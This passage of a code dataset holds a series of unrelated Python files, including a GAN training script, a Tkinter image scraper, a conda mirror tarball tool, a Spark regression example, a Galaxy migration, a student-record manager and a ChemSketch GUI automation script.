set\"+two_sep[pop].title()\r\n helping=\"public void\" +\" \"\r\n soup = \"(\"+ one_sep[pop] + \" \" + two_sep[pop] + \")\" +\"{\"\r\n kitchen = \"this.\"+two_sep[pop]\r\n print(helping + set.replace(\" \",\"\")+ soup)\r\n \r\n print(kitchen.replace(\" \",\"\")+\"=\"+two_sep[pop]+\";}\")#changes appropriate varibale to the given value\r\n if U1 > 0:\r\n print(\", \")\r\n \r\n print(\"}\")#End of Line\r\n #T1 ClassName, T2 Type, T3 Name, U1 number of instance fields\r\n \r\n#This code gets the information to use for Template()\r\nboolean=False\r\nwhile boolean==False:\r\n cmd=input(\"Instance Field Type: \")\r\n if cmd==\"\":\r\n boolean=True\r\n break\r\n CMD=input(\"Instance Field Name: \")\r\n it += cmd + \" \"\r\n int_name += CMD + \" \"\r\n counter = 1 + counter\r\n print(\"\\n\")\r\n#it = Type\r\n#int_name = instance name\r\n#counter = amount of instance fields\r\nTemplate(cn, it, int_name, counter)\r\ntime.sleep(60)\r\n","sub_path":"Java Class Writer_V3.py","file_name":"Java Class Writer_V3.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"66294456","text":"from proteus.default_n import *\nimport ls_p as physics\nfrom proteus import (StepControl,\n TimeIntegration,\n NonlinearSolvers,\n LinearSolvers,\n LinearAlgebraTools)\nfrom proteus.mprans import NCLS\nfrom proteus import Context\nct = Context.get()\nnLevels = ct.nLevels\nparallelPartitioningType = ct.parallelPartitioningType\nnLayersOfOverlapForParallel = ct.nLayersOfOverlapForParallel\nrestrictFineSolutionToAllMeshes = ct.restrictFineSolutionToAllMeshes\ntriangleOptions = ct.triangleOptions\n\ntimeIntegration = TimeIntegration.BackwardEuler_cfl\nstepController = StepControl.Min_dt_controller\n\nfemSpaces = {0:ct.basis}\nelementQuadrature = ct.elementQuadrature\nelementBoundaryQuadrature = ct.elementBoundaryQuadrature\n\nmassLumping = False\nconservativeFlux = None\nnumericalFluxType = NCLS.NumericalFlux\nsubgridError = NCLS.SubgridError(physics.coefficients, ct.nd)\nshockCapturing = NCLS.ShockCapturing(physics.coefficients,\n ct.nd,\n shockCapturingFactor = ct.ls_shockCapturingFactor,\n lag = ct.ls_lag_shockCapturing)\n\nfullNewtonFlag = True\nmultilevelNonlinearSolver = NonlinearSolvers.Newton\nlevelNonlinearSolver = NonlinearSolvers.Newton\n\nnonlinearSmoother = None\nlinearSmoother = None\n\nmatrix = LinearAlgebraTools.SparseMatrix\n\nif ct.opts.parallel:\n multilevelLinearSolver = LinearSolvers.KSP_petsc4py\n levelLinearSolver = LinearSolvers.KSP_petsc4py\nelse:\n multilevelLinearSolver = LinearSolvers.LU\n levelLinearSolver = LinearSolvers.LU\n\nlinear_solver_options_prefix = 'ncls_'\nlevelNonlinearSolverConvergenceTest = 'r'\nlinearSolverConvergenceTest = 'r-true'\n\ntolFac = 0.0\nlinTolFac = 0.001\nl_atol_res = 0.001*ct.ls_nl_atol_res\nnl_atol_res = ct.ls_nl_atol_res\nuseEisenstatWalker = False#True\n\nmaxNonlinearIts = 50\nmaxLineSearches = 0\n","sub_path":"2d/oscillatingCylinder/ls_n.py","file_name":"ls_n.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300229427","text":"from __future__ import print_function\nfrom datasets import TextDataset\nfrom trainer import condGANTrainer as trainer\n\nimport os\nimport sys\nimport time\nimport random\nimport pprint\nimport datetime\nimport dateutil.tz\n\nimport numpy as np\n\nimport torch\nimport torchvision.transforms as transforms\n\ndir_path = 
(os.path.abspath(os.path.join(os.path.realpath(__file__), './.')))\nsys.path.append(dir_path)\n\n\nCONFIG_NAME = 'DMGAN'\nDATASET_NAME = 'birds'\nDATA_DIR = '../data/birds'\nGPU_ID = 0\nWORKERS = 4\nBRANCH_NUM = 3\nFLAG = True\nNET_G = ''\nB_NET_D = True\nB_VALIDATION = False\nBATCH_SIZE = 2\nMAX_EPOCH = 800\nSNAPSHOT_INTERVAL = 25\nDISCRIMINATOR_LR = 0.0002\nGENERATOR_LR = 0.0002\nNET_E = '../DAMSMencoders/bird/text_encoder200.pth'\nGAMMA1 = 4.0\nGAMMA2 = 5.0\nGAMMA3 = 10.0\nLAMBDA = 5.0\nDF_DIM = 32\nGF_DIM = 64\nZ_DIM = 100\nR_NUM = 2\nEMBEDDING_DIM = 256\nCAPTIONS_PER_IMAGE = 10\nCUDA = True\nBASE_SIZE = 64\nENCODER_LR = 0.0002\nRNN_GRAD_CLIP = 0.25\nWORDS_NUM = 2\nRNN_TYPE = 'LSTM'\nCONDITION_DIM = 100\nB_ATTENTION = True\nB_DCGAN = False\n\n\ndef gen_example(wordtoix, algo):\n    '''generate images from example sentences'''\n    from nltk.tokenize import RegexpTokenizer\n    filepath = '%s/example_filenames.txt' % (DATA_DIR)\n    data_dic = {}\n    with open(filepath, "r") as f:\n        filenames = f.read().split('\\n')\n    for name in filenames:\n        if len(name) == 0:\n            continue\n        filepath = '%s/%s.txt' % (DATA_DIR, name)\n        with open(filepath, "r") as f:\n            print('Load from:', name)\n            sentences = f.read().split('\\n')\n            # a list of indices for a sentence\n            captions = []\n            cap_lens = []\n            for sent in sentences:\n                if len(sent) == 0:\n                    continue\n                sent = sent.replace("\\ufffd\\ufffd", " ")\n                tokenizer = RegexpTokenizer(r'\\w+')\n                tokens = tokenizer.tokenize(sent.lower())\n                if len(tokens) == 0:\n                    print('sent', sent)\n                    continue\n\n                rev = []\n                for t in tokens:\n                    t = t.encode('ascii', 'ignore').decode('ascii')\n                    if len(t) > 0 and t in wordtoix:\n                        rev.append(wordtoix[t])\n                captions.append(rev)\n                cap_lens.append(len(rev))\n            max_len = np.max(cap_lens)\n\n            sorted_indices = np.argsort(cap_lens)[::-1]\n            cap_lens = np.asarray(cap_lens)\n            cap_lens = cap_lens[sorted_indices]\n            cap_array = np.zeros((len(captions), max_len), dtype='int64')\n            for i in range(len(captions)):\n                idx = sorted_indices[i]\n                cap = captions[idx]\n                c_len = len(cap)\n                cap_array[i, :c_len] = cap\n            key = name[(name.rfind('/') + 1):]\n            data_dic[key] = [cap_array, cap_lens, sorted_indices]\n    algo.gen_example(data_dic)\n\nif __name__ == "__main__":\n\n\n    manualSeed = random.randint(1, 10000)\n    random.seed(manualSeed)\n    np.random.seed(manualSeed)\n    torch.manual_seed(manualSeed)\n    if CUDA:\n        torch.cuda.manual_seed_all(manualSeed)\n        torch.cuda.set_device(GPU_ID)\n        torch.backends.cudnn.benchmark = True\n        torch.backends.cudnn.deterministic = True\n    print("Seed: %d" % (manualSeed))\n\n    now = datetime.datetime.now(dateutil.tz.tzlocal())\n    timestamp = now.strftime('%Y_%m_%d_%H_%M_%S')\n    output_dir = '../output/%s_%s_%s' % \\\n        (DATASET_NAME,CONFIG_NAME, timestamp)\n\n    split_dir, bshuffle = 'train', True\n    if not FLAG:\n        # bshuffle = False\n        split_dir = 'test'\n\n    # Get data loader\n    imsize = BASE_SIZE * (2 ** (BRANCH_NUM - 1))\n    image_transform = transforms.Compose([\n        transforms.Scale(int(imsize * 76 / 64)),\n        transforms.RandomCrop(imsize),\n        transforms.RandomHorizontalFlip()])\n    dataset = TextDataset(DATA_DIR, split_dir,\n                          base_size=BASE_SIZE,\n                          transform=image_transform)\n    assert dataset\n    dataloader = torch.utils.data.DataLoader(\n        dataset, batch_size=BATCH_SIZE,\n        drop_last=True, shuffle=bshuffle, num_workers=int(WORKERS))\n\n    # Define models and go to train/evaluate\n    algo = trainer(output_dir, dataloader, dataset.n_words, dataset.ixtoword, dataset)\n\n    start_t = time.time()\n    if FLAG:\n        algo.train()\n    else:\n        '''generate 
images from pre-extracted embeddings'''\n if B_VALIDATION:\n algo.sampling(split_dir) # generate images for the whole valid dataset\n else:\n gen_example(dataset.wordtoix, algo) # generate images for customized captions\n end_t = time.time()\n print('Total time for training:', end_t - start_t)\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158023742","text":"from tkinter import *\nfrom tkinter import messagebox, PhotoImage, filedialog\nimport requests\nfrom bs4 import BeautifulSoup\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass Window:\n\n def __init__(self, root):\n self.root = root\n self.root.title(\"ImageGrabber v0.101262020\")\n self.root.iconphoto(True, PhotoImage(file=\"./assets/logo.png\"))\n\n self.image_urls = []\n self.folder = \"\"\n self.target_URL = \"\"\n\n self.first_row = 0\n self.first_column = 0\n\n self.message = Label(root, text=\"Enter Target URL:\")\n self.message.grid(row = self.first_row, column = self.first_column,\n sticky = \"e\")\n\n # Text box for the target url\n self.entry_box = Entry(root, width=100)\n self.entry_box.grid(row=self.first_row,\n column=self.first_column + 1, pady=10)\n # Button to scrape image urls from the url\n self.get_url_button = Button(text=\"Get Images\", command=self.scrape_urls, width=12)\n self.get_url_button.grid(\n row=self.first_row, column=self.first_column + 2, sticky=\"w\")\n \n # Button to select a folder in which images will be saved\n self.file_button = Button(\n text=\"Open Folder\", command=self.get_folder, width=12)\n self.file_button.grid(\n row=self.first_row, column=self.first_column + 3, sticky=\"w\")\n\n # Button to start downloading images\n self.scrape_button = Button(text=\"Download Images\", command=self.save_images, width=24)\n self.scrape_button.grid(\n row=self.first_row + 1, column=self.first_column + 2, columnspan=2, sticky=\"s\")\n\n # Text box that shows the web-scraping results\n self.lines = 30\n self.text = Text(root, height=self.lines, width=80)\n self.text.grid(row = self.first_row + 2, column = self.first_column + 1,\n pady=10)\n\n # Scrollbar for the text box\n self.scroll_bar = Scrollbar(root)\n self.scroll_bar.grid(row = self.first_row + 2, column = self.first_column + 2, sticky=\"w\") \n self.text.configure(yscrollcommand=self.scroll_bar.set)\n self.scroll_bar.configure(command=self.text.yview)\n\n def get_folder(self):\n \"\"\"\n Lets users choose destination folder \n \"\"\"\n self.folder = filedialog.askdirectory(initialdir=\"/\")\n if self.folder:\n displayed_text = \"Selected Destination: \" + \"\\n\" + self.folder\n else:\n displayed_text = \"Please Select a Folder\"\n label = Label(root, text=displayed_text, bg='#7EDC84')\n label.grid(row=self.first_row + 1, column=self.first_column + 1)\n\n def scrape_urls(self):\n \"\"\"\n Makes request to the target url and gets all the links to images\n \"\"\"\n target_url = self.entry_box.get()\n prefix_target_url = target_url.split(\"/\")[:3]\n prefix_target_url = \"/\".join(prefix_target_url)\n headers = {'User-Agent': 'Mozilla/5.0'}\n response = requests.get(target_url, headers=headers)\n soup = BeautifulSoup(response.text, \"html.parser\")\n images = soup.find_all(\"img\")\n\n for image in images:\n if image.get(\"src\", 0) != 0:\n source = image[\"src\"]\n else:\n source = image[\"data-src\"]\n self.image_urls.append(source)\n \n self.text.insert(END, f\"Scraping 
{target_url}...\")\n\n self.image_urls = [image for image in self.image_urls if image.endswith(\"jpg\") or image.endswith(\"png\") or image.endswith(\"gif\")]\n self.image_urls = [prefix_target_url + image if \"http\" not in image else image for image in self.image_urls ]\n self.image_urls = list(set(self.image_urls))\n self.text.delete(1.0, END)\n self.text.insert(END, f\"Successfully scraped {len(self.image_urls)} images.\")\n self.text.insert(END, \"\\n\" + \"|\")\n\n for image in self.image_urls:\n self.text.insert(END, \"\\n\")\n self.text.insert(END, f\"|--{image}\")\n self.text.insert(END, \"\\n\" + \"|\")\n\n def download_image(self, image_url):\n \"\"\"\n Makes request to the target url and gets all the links to images\n \"\"\"\n response = requests.get(image_url)\n filename = image_url.split(\"/\")[-1]\n if \".\" not in filename:\n filename = filename + \".jpeg\"\n with open(f\"{self.folder}/{filename}\", \"wb\") as f:\n f.write(response.content)\n\n def save_images(self):\n \"\"\"\n saving images taking advantage of multi-thread pool\n \"\"\"\n self.text.insert(END, \"--Started Saving Files.....\")\n with ThreadPoolExecutor() as executor:\n executor.map(self.download_image, self.image_urls)\n messagebox.showinfo(title=\"Operation Completed\",\n message=f\"Successfully saved {len(self.image_urls)} images\")\n\nif __name__ == \"__main__\":\n try:\n root = Tk()\n # root.tk.call('tk', 'scaling', 1.5)\n window = Window(root)\n root.mainloop()\n\n except KeyboardInterrupt:\n root.destroy()\n","sub_path":"image_grabber.py","file_name":"image_grabber.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"522681916","text":"import os\nimport sys\nimport json\nimport hashlib\nimport tarfile\nfrom os.path import abspath, isdir, join, relpath\n\n\n__version__ = '1.0.0'\nverbose = False\nmirror_dir = None\n\n\ndef md5_file(path):\n h = hashlib.new('md5')\n with open(path, 'rb') as fi:\n while 1:\n chunk = fi.read(262144)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\ndef find_repos():\n for root, unused_dirs, files in os.walk(mirror_dir):\n if 'repodata.json' in files and 'repodata.json.bz2' in files:\n yield root\n\ndef all_repodata():\n d = {}\n for repo_path in find_repos():\n with open(join(repo_path, 'repodata.json')) as fi:\n index = json.load(fi)['packages']\n d[repo_path] = index\n return d\n\ndef verify_all_repos():\n d = all_repodata()\n for repo_path, index in d.items():\n for fn, info in index.items():\n path = join(repo_path, fn)\n if info['md5'] == md5_file(path):\n continue\n print('MD5 mismatch: %s' % path)\n\ndef write_reference(path):\n data = json.dumps(all_repodata(), indent=2, sort_keys=True)\n # make sure we have newline at the end\n if not data.endswith('\\n'):\n data += '\\n'\n with open(path, 'w') as fo:\n fo.write(data)\n\ndef read_reference():\n path = 'reference.json'\n try:\n with open(path) as fi:\n return json.load(fi)\n except FileNotFoundError:\n sys.exit('No such file: %s' % path)\n\ndef get_updates():\n d1 = read_reference()\n d2 = all_repodata()\n result = []\n for repo_path, index2 in d2.items():\n index1 = d1.get(repo_path, {})\n if index1 != index2:\n for fn in 'repodata.json', 'repodata.json.bz2':\n result.append(relpath(join(repo_path, fn), mirror_dir))\n for fn, info2 in index2.items():\n info1 = index1.get(fn, {})\n if info1.get('md5') != info2['md5']:\n result.append(relpath(join(repo_path, fn), mirror_dir))\n return result\n\ndef 
tar_repo():\n fn = 'update.tar'\n t = tarfile.open(fn, 'w')\n for f in get_updates():\n if verbose:\n print('adding: %s' % f)\n t.add(join(mirror_dir, f), f)\n t.close()\n print(\"Wrote: %s\" % fn)\n\ndef main():\n from optparse import OptionParser\n\n p = OptionParser(usage=\"usage: %prog [options] MIRROR_DIRECTORY\",\n description='create \"differential\" tarballs of a conda '\n 'mirror repository')\n\n p.add_option('--create',\n action=\"store_true\",\n help=\"create a differential tarball\")\n\n p.add_option('--reference',\n action=\"store_true\",\n help=\"create a reference point file and exit\")\n\n p.add_option('--show',\n action=\"store_true\",\n help=\"show the files in respect to the latest reference \"\n \"point file (which would be included in the \"\n \"differential tarball) and exit\")\n\n p.add_option('--verify',\n action=\"store_true\",\n help=\"verify the mirror repository and exit\")\n\n p.add_option('-v', '--verbose',\n action=\"store_true\")\n\n p.add_option('--version',\n action=\"store_true\",\n help=\"print version and exit\")\n\n opts, args = p.parse_args()\n\n if opts.version:\n print(__version__)\n return\n\n if len(args) != 1:\n p.error('exactly one argument is required, try -h')\n\n global mirror_dir\n mirror_dir = abspath(args[0])\n if not isdir(mirror_dir):\n sys.exit(\"No such directory: %r\" % mirror_dir)\n\n if opts.verbose:\n global verbose\n verbose = True\n\n if opts.create:\n tar_repo()\n return\n\n if opts.verify:\n verify_all_repos()\n return\n\n if opts.show:\n for path in get_updates():\n print(path)\n return\n\n if opts.reference:\n write_reference('reference.json')\n return\n\n print(\"Nothing done.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"mk_diff_tar.py","file_name":"mk_diff_tar.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222192197","text":"import numpy as np\n\n\ndef binarize(X, y, a_percentile, b_percentile):\n \"\"\" Splits data to be smaller than the a_percentil and larger than b_percentile\n :param x: input\n :param y: labels\n :param a_percentile:\n :param b_percentile:\n :return:\n :rtype: X, Y\n \"\"\"\n data_index = ((a_percentile >= y) | (y >= b_percentile))\n y = y[data_index]\n x=X[data_index[:, 0]]\n\n\n y[y <= a_percentile] = 0\n y[y >= b_percentile] = 1\n\n return x, np.expand_dims(y, 1)\n\n\ndef test_accuracy(y_pred, y_true):\n \"\"\" Compute test error / accuracy\n Params:\n ------\n y_pred: model prediction\n y_true: ground truth values\n return:\n ------\n Accuracy / error on test set\n \"\"\"\n\n # Apply threshold\n threshold = 0.50\n\n y_binary = np.zeros_like((y_pred))\n y_binary[y_pred >= threshold] = 1\n y_binary[y_pred < threshold] = 0\n\n # Get final predictions.\n y_binary = y_binary.flatten().astype(int)\n y_true = y_true.flatten().astype(int)\n\n acc = (y_binary == y_true).mean()\n return acc\n\n","sub_path":"exercise2/exercise_04/exercise_code/networks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69498404","text":"\"\"\"\r\nThien Pham\r\nAssignment #10\r\nCOSC 1306\r\n\"\"\"\r\nimport time\r\nstart = time.time()\r\nresult = {}\r\n\r\nfor perimeter in range(12,2019,2):\r\n for a in range(1,perimeter//3):\r\n for b in range(a+1,perimeter//2):\r\n c = perimeter - a - b\r\n if (a*b)%12 ==0 and a**2 + b**2 == c**2:\r\n if perimeter not in result:\r\n result[perimeter] = 
[]\r\n result[perimeter].append((a,b,c))\r\n \r\nlength = []\r\n\r\nmaximum = []\r\n\r\nfor x in result:\r\n length.append(int(len(result[x])))\r\n maximum.append(x)\r\n\r\nend = time.time()\r\nprint(\"=\"*80)\r\nprint(\"The perimeter of\",maximum[length.index(max(length))],\"gives\",len(result[maximum[length.index(max(length))]]),\"combinations\")\r\nprint(\"=\"*80)\r\nprint(\"The triangles are:\")\r\nfor i in result[maximum[length.index(max(length))]]:\r\n print(i)\r\nprint(\"=\"*80)\r\n\r\nprint(\"Elapsed time:\",end - start)","sub_path":"COSC_1306/Assignment#10.py","file_name":"Assignment#10.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531241950","text":"# linear-regression.py\n# August 9, 2020\n#\n#\n\nfrom __future__ import print_function\n\n# DataFrame APIs in ml library, not MLLib\nfrom pyspark.ml.regression import LinearRegression\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.linalg import Vectors\n\nif __name__ == \"__main__\":\n spark = SparkSession.builder.appName(\"LinearRegression\").getOrCreate()\n\n # Load data and convert it to the format MLLib expects\n # (label (feature, feature, feature, ...))\n # (any type?, dense? Vector)\n inputLines = spark.sparkContext.textFile(\"regression.txt\")\n data = inputLines.map(lambda x: x.split(\",\")).map(lambda x: (float(x[0]), Vectors.dense(float(x[1]))))\n\n # Convert RDD to DataFrame\n # If you are importing data from a structured source, such as a database or\n # JSON, you can read it directly into a DataFrame\n colNames = [\"label\", \"features\"]\n df = data.toDF(colNames)\n\n # Split data into training and testing data\n trainTest = df.randomSplit([0.5, 0.5])\n trainingDF = trainTest[0]\n testDF = trainTest[1]\n\n # Create linear regression model\n lir = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\n # Train the model\n model = lir.fit(trainingDF)\n\n # Evaluate model on testing data\n # Generate predictions using out linear regression model for all features in\n # our test dataframe\n fullPredictions = model.transform(testDF).cache()\n\n # Extract the predictions and the \"known\" correct labels\n predictions = fullPredictions.select(\"prediction\").rdd.map(lambda x: x[0])\n labels = fullPredictions.select(\"label\").rdd.map(lambda x: x[0])\n\n predictionAndLabel = predictions.zip(labels).collect()\n\n # Print results\n for example in predictionAndLabel:\n print(example)\n\n","sub_path":"spark_python/46-dataframes-with-mllib/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452017639","text":"\"\"\"\nMigration script to alter the type of the tool_dependency.version column from TrimmedString(40) to Text.\n\"\"\"\nfrom __future__ import print_function\n\nimport logging\nimport sys\n\nfrom sqlalchemy import MetaData, Table\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(sys.stdout)\nformat = \"%(name)s %(levelname)s %(asctime)s %(message)s\"\nformatter = logging.Formatter(format)\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\nmetadata = MetaData()\n\n\ndef upgrade(migrate_engine):\n metadata.bind = migrate_engine\n print(__doc__)\n metadata.reflect()\n Table(\"tool_dependency\", metadata, autoload=True)\n # Change the tool_dependency table's version column from TrimmedString to Text.\n 
if migrate_engine.name in ['postgres', 'postgresql']:\n cmd = \"ALTER TABLE tool_dependency ALTER COLUMN version TYPE Text;\"\n elif migrate_engine.name == 'mysql':\n cmd = \"ALTER TABLE tool_dependency MODIFY COLUMN version Text;\"\n else:\n # We don't have to do anything for sqlite tables. From the sqlite documentation at http://sqlite.org/datatype3.html:\n # 1.0 Storage Classes and Datatypes\n # Each value stored in an SQLite database (or manipulated by the database engine) has one of the following storage classes:\n # NULL. The value is a NULL value.\n # INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.\n # REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.\n # TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).\n # BLOB. The value is a blob of data, stored exactly as it was input.\n cmd = None\n if cmd:\n try:\n migrate_engine.execute(cmd)\n except Exception:\n log.exception(\"Altering tool_dependency.version column from TrimmedString(40) to Text failed.\")\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n # Not necessary to change column type Text to TrimmedString(40).\n pass\n","sub_path":"lib/galaxy/model/migrate/versions/0100_alter_tool_dependency_table_version_column.py","file_name":"0100_alter_tool_dependency_table_version_column.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613569219","text":"\n\nimport time\n\n\n# ----------学生信息录入----------\ndef info_input():\n _lst = []\n n = 1\n while True:\n name = input(\"学生\" + str(n) + \"姓名:\")\n if not name:\n break\n age = int(input(\"学生\" + str(n) + \"年龄:\"))\n score = int(input(\"学生\" + str(n) + \"成绩:\"))\n d = {\"name\":name, \"age\":age, \"score\":score}\n _lst.append(d)\n n += 1\n return _lst\n\n\n# ----------打印学生信息----------\ndef print_info(curList):\n # 打印边线\n def print_frame():\n print(\"+\" + (12 * \"-\" + \"+\") * 3)\n\n def print_title():\n title = \"|\" + \"Name\".center(12) + \"|\" + \"Age\".center(12) \\\n + \"|\" + \"Score\".center(12) + \"|\"\n print_frame()\n print(title)\n print_frame()\n\n print(\"请稍后. . 
.\")\n time.sleep(2)\n print_title()\n for d in curList:\n fmt = \"|\" + d[\"name\"].center(12) + \"|\" + str(d[\"age\"]).center(12) \\\n + \"|\" + str(d[\"score\"]).center(12) + \"|\"\n print(fmt)\n print_frame()\n\n\n# ----------按分数线学生信息----------\ndef find_score_line(lst, score_line):\n _lst = [x for x in lst if x[\"score\"] >= score_line]\n if len(_lst):\n print_info(_lst)\n else:\n print(\"没有学生达到分数线!\")\n\n\n# -----按成绩排序-----\ndef sort_score_desc(lst, rev=False):\n def scoreKey(d):\n return d[\"score\"]\n _lst = sorted(read_info(filename, mode, 1), key=scoreKey, reverse=rev)\n if rev:\n print(\"*****按成绩从高到低排序*****\")\n else:\n print(\"*****按成绩从低到高排序*****\")\n print_info(_lst)\n\n\n# -----按年龄排序-----\ndef sort_age_desc(lst, rev=False):\n def myage(d):\n return d[\"age\"]\n lage = sorted(read_info(filename, mode, 1), key=myage, reverse=rev)\n if rev:\n print(\"*****按年龄从高到低排序*****\")\n else:\n print(\"*****按年龄从低到高排序*****\")\n print_info(lage)\n\n\n# ----------删除学生信息----------\ndef del_info(filename, mode):\n name = input(\"输入学生姓名:\")\n if name != '':\n try:\n fr = open(filename, mode)\n b1 = bytes(name,'utf-8')\n for line in fr:\n if b1 in line:\n fr.seek(-len(line),1)\n\n fr.write(b'')\n break\n else:\n print(\"没有找到这名学生!\")\n fr.flush()\n fr.close()\n except Exception:\n print(\"文件操作异常\")\n else:\n print(\"学生姓名不能为空\")\n\n\n# ----------修改学生信息----------\ndef chage_info():\n try:\n name = input(\"输入学生姓名:\")\n fr = get_file_stream('r+b')\n fw = None\n flagL = fr.readlines()\n for x in range(len(flagL)):\n if name in flagL[x]:\n score = int(input(\"输入新成绩:\"))\n l = flagL[x].split(',')\n flagL[x] = l[0] + ',' + str(l[1]) + ',' + str(score) + '\\n'\n fw = get_file_stream('w+b')\n fw.writelines(flagL)\n break\n else:\n print(\"没有找到这名学生!\")\n return False\n except:\n print(\"文件操作异常\")\n return False\n finally:\n fr.close()\n if fw != None:\n fw.close()\n return True\n\n\n# --------读取信息返回列表---------\ndef read_info(filename, mode, type=0):\n try:\n f = open(filename, mode)\n _lst = f.readlines()\n if len(_lst) > 0:\n _lst1 = []\n for s in _lst:\n if s != '\\n': \n l = s.split(',')\n d = {'name':l[0], 'age':l[1], 'score':l[2][:-1]}\n _lst1.append(d)\n if type == 0:\n print_info(_lst1)\n else:\n return _lst1\n else:\n print(\"学生信息为空\")\n f.close()\n except:\n print(\"文件操作异常\")\n\n\n# ----------保存信息到文件----------\ndef save_info_file(lst, filename, mode='a+'):\n if len(lst) > 0:\n try:\n f = open(filename, mode)\n for x in lst:\n s = \"%s,%d,%d\\r\\n\" % (x[\"name\"], x['age'], x['score'])\n f.write(bytes(s, 'utf-8'))\n f.flush()\n f.close()\n except IOError:\n print(\"文件操作异常\")\n return False\n else:\n print(\"学生信息为空\")\n return False\n return True\n","sub_path":"student/v_file/m_student.py","file_name":"m_student.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130241530","text":"from pywinauto import application\r\nimport os\r\nimport re\r\n\r\napp = application.Application()\r\napp.start(r\"C:/ACD2018FREE/CHEMSK.EXE\")\r\n\r\ndlg_spec = app.window(title='ACD/Labs Products')\r\ndlg_spec[\"OK\"].click()\r\n\r\ndlg_spec = app.window(title='ACD/ChemSketch (Freeware) - [noname01.sk2]')\r\ndlg_spec.type_keys('%FO')\r\n\r\ndlg_spec = app.window(title='Open Document')\r\ndlg_spec.Edit.set_text( \"0000.sk2\" )\r\ndlg_spec.type_keys('{ENTER}')\r\n\r\n\r\n \r\n####################################\r\ndef ACD_save_mol(save_mol_name,SMILES_str):\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - 
[C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n dlg_spec.type_keys('%PD')\r\n dlg_spec.type_keys('%TGM')\r\n\r\n dlg_spec = app.window(title='Generate Structure from SMILES')\r\n dlg_spec.Edit.set_text(SMILES_str)\r\n dlg_spec[\"OK\"].click()\r\n\r\n\r\n try:\r\n dlg_spec = app.window(title=r'Warning')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n #dlg_spec.click_input(button='left', coords=(800, 600))\r\n\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n dlg_spec.click_input(button='left', coords=(800, 600))\r\n\r\n dlg_spec.type_keys('%T3')\r\n\r\n try:\r\n dlg_spec = app.window(title=r'3D Structure Optimization')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n\r\n try:\r\n dlg_spec = app.window(title=r'Warning')\r\n dlg_spec.type_keys('Y')\r\n dlg_spec.type_keys('{ENTER}')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n except:\r\n \r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n\r\n\r\n\r\n\r\n \r\n dlg_spec.type_keys('%FE')\r\n dlg_spec = app.window(title=r'ACD/ChemSketch (Freeware) - [C:\\Users\\Administrator\\Desktop\\hubChem\\lstm_mol\\tox21_data\\0000.sk2]')\r\n dlg_spec = app.window(title='Export')\r\n\r\n\r\n dlg_spec[\"保存类型(&T):ComboBox\"].select(0)\r\n dlg_spec.type_keys('%N')\r\n dlg_spec.Edit.set_text( save_mol_name )\r\n dlg_spec.type_keys('{ENTER}')\r\n \r\n\r\n####################################\r\n\r\n\r\nfloder = 